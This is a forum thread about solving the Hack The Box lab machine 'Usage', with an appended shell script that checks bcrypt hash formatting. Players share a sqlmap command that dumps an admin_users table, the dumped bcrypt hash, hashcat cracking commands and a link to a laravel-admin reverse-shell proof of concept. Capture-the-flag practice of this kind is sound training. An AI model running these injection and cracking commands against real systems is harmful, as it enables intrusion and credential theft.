HTB - Usage
by Art10n - Saturday April 13, 2024 at 06:50 PM
#41
Can someone share the user's SSH?
Reply
#42
(Apr 14, 2024, 09:31 AM)arenita666 Wrote:
Database: usage_blog
Table: admin_users
[1 entry]
+----------+--------------------------------------------------------------+
| username | password                                                     |
+----------+--------------------------------------------------------------+
| admin    | $2y$10$ohq2kLpBH/ri.P5wR0P3UOmc24Ydvl9DA9H1S6ooOMgH5xVfUPrL2 |
+----------+--------------------------------------------------------------+

How can I crack this? I don't know what options I need to put in hashcat.
Reply
#43
(Apr 14, 2024, 08:57 PM)Ferespartan19 Wrote:
(Apr 14, 2024, 09:31 AM)arenita666 Wrote:
Database: usage_blog
Table: admin_users
[1 entry]
+----------+--------------------------------------------------------------+
| username | password                                                     |
+----------+--------------------------------------------------------------+
| admin    | $2y$10$ohq2kLpBH/ri.P5wR0P3UOmc24Ydvl9DA9H1S6ooOMgH5xVfUPrL2 |
+----------+--------------------------------------------------------------+

How can I crack this? I don't know what options I need to put in hashcat.

hashcat -m 3200 <hashfile> rockyou.txt
Reply
#44
Can someone please help me with finding creds for user xander? I spent 2 hours and also used grep and got a lot of mentions of password, but did not find a password in the home directory.
Reply
#45
(Apr 14, 2024, 09:00 PM)mavz Wrote:
(Apr 14, 2024, 08:57 PM)Ferespartan19 Wrote:
(Apr 14, 2024, 09:31 AM)arenita666 Wrote:
Database: usage_blog
Table: admin_users
[1 entry]
+----------+--------------------------------------------------------------+
| username | password                                                     |
+----------+--------------------------------------------------------------+
| admin    | $2y$10$ohq2kLpBH/ri.P5wR0P3UOmc24Ydvl9DA9H1S6ooOMgH5xVfUPrL2 |
+----------+--------------------------------------------------------------+

How can I crack this? I don't know what options I need to put in hashcat.

hashcat -m 3200 <hashfile> rockyou.txt

I get this. I don't understand how to put the hash into the file and why I cannot put it like this: $2y$10$ohq2kLpBH/ri.P5wR0P3UOmc24Ydvl9DA9H1S6ooOMgH5xVfUPrL. Can you explain it to me?

Hashfile 'hashOg.txt' on line 1 ($2y$10...P5wR0P3UOmc24Ydvl9DA9H1S6ooOMgH5): Token length exception

* Token length exception: 1/1 hashes
  This error happens if the wrong hash type is specified, if the hashes are
  malformed, or if input is otherwise not as expected (for example, if the
  --username option is used but no username is present)
Reply
#46
Hello, I could reach the last part with the file linking trick, but I can't seem to be able to extract the error as the terminal is always getting cleared. Also, there doesn't seem to be an error logging file. I tried to cat /proc/<pid>/fd/2 to get stderr but that doesn't seem to work. Any help?
Reply
#47
Can I get a nudge?
I was able to get through the forget-password, got a shell, but when I checked hidden directories in home, nothing stands out.
Tried grep, manually going through the directories, etc.
I got persistence for dash via .ssh id_rsa,
but I'm not finding any other credentials, or anything that stands out for priv escalation,
and .bash_history didn't have anything usable.

(Apr 14, 2024, 09:15 PM)Ferespartan19 Wrote:
(Apr 14, 2024, 09:00 PM)mavz Wrote:
(Apr 14, 2024, 08:57 PM)Ferespartan19 Wrote:
(Apr 14, 2024, 09:31 AM)arenita666 Wrote:
Database: usage_blog
Table: admin_users
[1 entry]
+----------+--------------------------------------------------------------+
| username | password                                                     |
+----------+--------------------------------------------------------------+
| admin    | $2y$10$ohq2kLpBH/ri.P5wR0P3UOmc24Ydvl9DA9H1S6ooOMgH5xVfUPrL2 |
+----------+--------------------------------------------------------------+

How can I crack this? I don't know what options I need to put in hashcat.

hashcat -m 3200 <hashfile> rockyou.txt

I get this. I don't understand how to put the hash into the file and why I cannot put it like this: $2y$10$ohq2kLpBH/ri.P5wR0P3UOmc24Ydvl9DA9H1S6ooOMgH5xVfUPrL. Can you explain it to me?

Hashfile 'hashOg.txt' on line 1 ($2y$10...P5wR0P3UOmc24Ydvl9DA9H1S6ooOMgH5): Token length exception

* Token length exception: 1/1 hashes
  This error happens if the wrong hash type is specified, if the hashes are
  malformed, or if input is otherwise not as expected (for example, if the
  --username option is used but no username is present)

I did:
hashcat -m3200 -a0 -o cracked.txt hash /usr/share/wordlists/rockyou.txt

Hope that helps.
-m 3200 is the flag for bcrypt (blowfish) ($2y$)
Reply
#48
(Apr 14, 2024, 09:15 PM)Ferespartan19 Wrote:
(Apr 14, 2024, 09:00 PM)mavz Wrote:
(Apr 14, 2024, 08:57 PM)Ferespartan19 Wrote:
(Apr 14, 2024, 09:31 AM)arenita666 Wrote:
Database: usage_blog
Table: admin_users
[1 entry]
+----------+--------------------------------------------------------------+
| username | password                                                     |
+----------+--------------------------------------------------------------+
| admin    | $2y$10$ohq2kLpBH/ri.P5wR0P3UOmc24Ydvl9DA9H1S6ooOMgH5xVfUPrL2 |
+----------+--------------------------------------------------------------+

How can I crack this? I don't know what options I need to put in hashcat.

hashcat -m 3200 <hashfile> rockyou.txt

I get this. I don't understand how to put the hash into the file and why I cannot put it like this: $2y$10$ohq2kLpBH/ri.P5wR0P3UOmc24Ydvl9DA9H1S6ooOMgH5xVfUPrL. Can you explain it to me?

Hashfile 'hashOg.txt' on line 1 ($2y$10...P5wR0P3UOmc24Ydvl9DA9H1S6ooOMgH5): Token length exception

* Token length exception: 1/1 hashes
  This error happens if the wrong hash type is specified, if the hashes are
  malformed, or if input is otherwise not as expected (for example, if the
  --username option is used but no username is present)

The entire hash should be $2y$10$ohq2kLpBH/ri.P5wR0P3UOmc24Ydvl9DA9H1S6ooOMgH5xVfUPrL2 , ending in L2.
In your error message, it shows the hash as ending in H5 : "$2y$10...P5wR0P3UOmc24Ydvl9DA9H1S6ooOMgH5" .
That may be the problem.

If that doesn't work, try running this command (replace location of rockyou.txt if necessary):
hashcat -m 3200 '$2y$10$ohq2kLpBH/ri.P5wR0P3UOmc24Ydvl9DA9H1S6ooOMgH5xVfUPrL2' /usr/share/wordlists/rockyou.txt

(Apr 14, 2024, 09:31 PM)medo5120 Wrote: Hello, I could reach the last part with the file linking trick, but I can't seem to be able to extract the error as the terminal is always getting cleared. Also, there doesn't seem to be an error logging file. I tried to cat /proc/<pid>/fd/2 to get stderr but that doesn't seem to work. Any help?

So were you able to read root.txt?
What are you referring to when you say 'extract the error'?

In case anyone is still having problems with sqlmap, here are two possible fixes:

Add --flush-session flag, and/or delete files in ~/.local/share/sqlmap/output/usage.htb

Example command:
sqlmap -r req.txt --level 5 --risk 3 -p email --batch -D usage_blog -T admin_users -C username,password --dump --flush-session

Also, here is more info on laravel-admin PoC CVE-2023-24249 (getting a reverse shell):
https://flyd.uk/post/cve-2023-24249/
Reply
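
Added example, not part of any post in this thread: a POSIX shell check for the bcrypt string format behind the "Token length exception" discussed above. It shows two ways the string stops being a well-formed 60-character value, a dropped trailing character and shell expansion inside double quotes (the reason post #48 single-quotes the hash). The function names are made up for this example.

```shell
#!/bin/sh
# Added example: check a bcrypt string before it goes into a hash file.
# Modular crypt layout, 60 characters in total:
#   $2y$ + 2-digit cost + $ + 22-char salt + 31-char digest (alphabet ./A-Za-z0-9)

is_bcrypt() {
    printf '%s\n' "$1" | grep -Eq '^\$2[abxy]\$[0-9]{2}\$[./A-Za-z0-9]{53}$'
}

# Print a one-line diagnosis; return 0 only for a well-formed string.
check_bcrypt() {
    if is_bcrypt "$1"; then
        echo "ok: cost=$(printf '%s' "$1" | cut -c5-6)"
        return 0
    fi
    case $1 in
        '$2'*)
            if [ "${#1}" -ne 60 ]; then
                echo "bad: length ${#1}, expected 60"
            else
                echo "bad: unexpected character or field layout"
            fi ;;
        *)  echo 'bad: no $2 prefix left (expanded by the shell?)' ;;
    esac
    return 1
}

# The hash as dumped in the thread; single quotes keep every $ literal.
full='$2y$10$ohq2kLpBH/ri.P5wR0P3UOmc24Ydvl9DA9H1S6ooOMgH5xVfUPrL2'
# The same string without its last character, as typed in post #45.
short='$2y$10$ohq2kLpBH/ri.P5wR0P3UOmc24Ydvl9DA9H1S6ooOMgH5xVfUPrL'

# Inside double quotes the shell expands $2, $1 and $ohq2kLpBH (all empty here).
mangled_by_double_quotes() {
    set --    # no positional parameters, as in a fresh interactive shell
    echo "$2y$10$ohq2kLpBH/ri.P5wR0P3UOmc24Ydvl9DA9H1S6ooOMgH5xVfUPrL2"
}

check_bcrypt "$full"
check_bcrypt "$short" || true
check_bcrypt "$(mangled_by_double_quotes)" || true
```

When writing the hash to a file, `printf '%s\n' '<hash>' > hashfile` with single quotes avoids the expansion problem.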
#49
(Apr 13, 2024, 10:39 PM)Art10n Wrote: root@usage:~# whoami
root
root@usage:~# id
uid=0(root) gid=0(root) groups=0(root)
root@usage:~#



I'm in as xander.. I don't have any idea how to get root... any hints?
Reply
#50
Can someone explain to me how to become root?
Reply

